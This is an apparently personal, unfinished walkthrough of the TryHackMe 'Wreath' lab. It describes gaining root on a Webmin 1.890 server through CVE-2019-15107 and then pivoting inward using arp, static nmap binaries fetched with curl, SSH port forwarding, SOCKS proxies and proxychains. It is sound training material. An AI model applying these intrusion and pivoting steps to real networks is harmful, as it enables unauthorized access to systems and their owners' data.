๐ก https://tryhackme.com/room/wreath
- There are three machines on the network
- There is public facing webserver
- There is self hosted git server on network
- There is a pc running on the network that has antivirus installed (probably windows)
- Windows PC cannot be accessed directly from public facing webserver (Check this)
- TCP SYN Scan
- Service Version Detection on Ports
- Nmap Discovery Script
- Port range 0-15000
- There is 4 ports open and 1 port closed. (Click triangle to expand.)
- 22/tcp open ssh OpenSSH 8.0 (Protocol 2.0)
- 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
- 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
- 9090/tcp closed zeus-admin
- 10000/tcp open http MiniServ 1.890 (Webmin httpd)
- Web Server is running on centos and published on Apache Server.
- Domain name is "thomaswreath.thm"
- There is an e-mail in website. (me@thomaswreath.thm)
- There is an admin panel on port 10000
- Found a website on 80/443 ports. (DNS is not configured, need to add the domain name in /etc/hosts file.)
- Found a website admin panel which is vulnerable (Webmin 1.890).
- As we can see below, this vulnerability is available for 1.890 too.
- (Just searched "webmin 1.890 vulnerability")
- It is possible to exploit with remote command execution vulnerabilities.
- I wanted to check python exploits first because I think this is easier.
- There is lots of github repo, let's check the first of them.
- It looks like it can execute linux commands as root user. This means we can do everything inside.
- This means we can use this command to create reverse shell of course.
- We can check files like this either but it is not comfortable, but we can.
- There is another python file that can create reverse shell and connect us. That's what I was looking for.
- CVE-2019-15107
- Found id_rsa file including ssh authentication key and connected on ssh.
- Exploiting done and no need to escelation anymore because we connected as root.
Pivoting is accessing other machines over one machine in the network and getting deeper. After accessing the public-faced server, you can access other machines by using some technics.
Enumeration is collecting information and learning what type of structure in front of us. What methods can we use?
ifconfig command shows us interfaces information, this means how many interface machine has, what is it's IP, gateway(probably). We have connected the machine on ssh. run this command and see.
We have one ethernet interface named "eth0", nothing else.
When I research pivoting and enumeration technics, I see arp -a command.
Arp table is a table that holds IP addresses and mac addresses to know what IP address is owned by who. When I look into the table I can see how many machines communicating with this machine and what is their mac addresses and IPs. So run this command.
I can see that two machines are communicating with this machine recently. 10.200.99.1 probably is the gateway. The second machine could be the git server because he said there is a local git server that can update the website with his command.
resolv.conf file holds DNS settings, if you can see "nameserver" and IP next to it, it means this IP is the DNS.
DNS holds name addresses of IPs. Instead of writing an IP of a website or machine, if you have a DNS server you can use, you can write just this machine's name, the system automatically recognizes the IP from the name. (Example: "google.com" is a domain name)
If you want to scan with Nmap on ssh and it is not installed on that machine, you can copy the portable version of Nmap to the remote machine using this command:
scp <-i key_file> <Local File Location> <user@remote_machine_IP:location_to_copy>
-i: Authorization key (If you don't have that and you have a password don't write it)
scp -i id_rsa nmap-portable.zip root@10.200.99.200:/root/Example Nmap Scan:
/root/nmap-portable/run-nmap.sh -sS -sV -O 10.200.99.0/24- Let's see what proxy is and how could we use this for pivoting.
In the simplest terms for example, when you want to access somewhere like a website, you are asking someone to access this website, if you don't have access to this website and "someone" has access, it accesses this website and shows this website to you. Your IP is hidden because you are not accessing that website, you are just asking someone and it is accessing, so the website can not detect that you are seeing that.
For more and technically information visit here.
We can use this tool for sending requests through the IP and Port that we want. You can read this to know how to use and configure. For example:
- If we have this type of configuration "socks4 127.0.0.1 4242" when I send a request or packet while using proxychains, the packet will be sent from this Host and Port.
- If I want to connect somewhere over telnet through proxy I can use that command;
proxychains telnet 172.16.0.100 23- This telnet request will be sent from my IP and 4242 port to 172.16.0.100.
This is a web browser extension and if we need proxy for accessing webserver we can use this.
SSH Tunnelling is creating a tunnel by using ssh connection. If you have an SSH connection to the machine that you are attacking, you can create a tunnel there and you can access everywhere in that network that it can.
For more information visit here.
Basically, if we can not access that green server above, we ask the red server to access green and show us. This is like an exact tunnel. If you can not get inside, you can dig a tunnel to get inside ๐
Imagine that we have Blue Server above and we don't have access to Green Servers
Web Server but we want to access that Web Server.
We have an SSH connection to Red Server and Red Server has access to Green Servers
Web Server. Let's dig a tunnel to Red Server to access Green Server.
We can forward our 8080 port to 192.168.0.3:80 through 192.168.0.2
ssh -L 8080:192.168.0.3:80 user@192.168.0.2 -Fn
ssh -L <local_port_that_we_forward>:<The_server_IP_that_we_want_to_access>:<port> <username_for_ssh_connection>@<IP> -Fn
-L:Local Port Forwarding
-Fn:Establish that connection background and don't execute commandOf course, we can create SSH Proxy Tunnel either. If we do that we don't need to connect just one port, we can use this proxy connection with FoxyProxy to access the webserver, we can use proxychains tool to execute some other commands.
If you use that command you can set your proxy configuration to localhost:1337 and access everywhere from SSH server.
ssh -D 1337 user@192.168.0.2 -fNLet's use our new knowledge. We know that if a tool is not installed on the target machine, we can upload a static binary version of the tool to the target and use it. So I created an HTTP server by using python to publish Nmap static binary version. So I can download this tool from my machine to the target machine that we can communicate.
I am publishing that Wreath directory and I am downloading that tool on my target machine.
sudo python3 -m http.server 80 //For publishing my directory over HTTP.
curl <my_attacking_ip>/tools/Enumeration/Linux/nmap-Janberkb -o /tmp/nmap-Janberkb && chmod +x /tmp/nmap-Janberkb
//It means download nmap-Janberkb from <my_attacking_ip> to /tmp/ folder.I am going to scan that network from this web server's eyes and look at which servers are running and which ports are open. Now I will use the static binary Nmap version to scan the network.
./nmap-Janberkb -sn 10.200.94.0/24 -oN scan-Janberkb
-sn: Not scan any port just scan hosts
-oN: Output normal text file named <name_of_the_file>
We can see that 5 hosts up and running
There is a note saying that the host ending in .250 and .1 should be excluded from answers because they are not part of the vulnerable network. So there are actually 3 hosts is running on the network. The host .200 is our exploited host. So there is 2 another host that we need to exploit. Let's check their ports with Nmap.
- All ports on .100 host is filtered.
- There all open ports on the .150 host are.
We need to check what server is this, what web application running on the host. I will use forward tunneling.
I am using this command for forward tunneling and I set the local port 1337. So if I want to access the HTTP service on the .150 host I can configure my foxy proxy on firefox. I configured the tunnel and now I will use foxy proxy.
Click the extension, If you don't have you need to add the extension to your browser.
Go to the options and Add the connection like above.
I forwarded my local 1337 port so I need to configure for that.
After that I can try to go to http://10.200.94.150:80/ on browser.
I can understand that gitstack is running on the host. We can see that there are some other paths we can see. Let's try them.
I went to http://10.200.94.150:80/gitstack and there is an admin panel. I tried admin/ admin but didn't work :) So I need to find some vulnerabilities or I can try generic password. I will try vulns first because it is easier.
searchsploit gitstack
Uncompleted yet.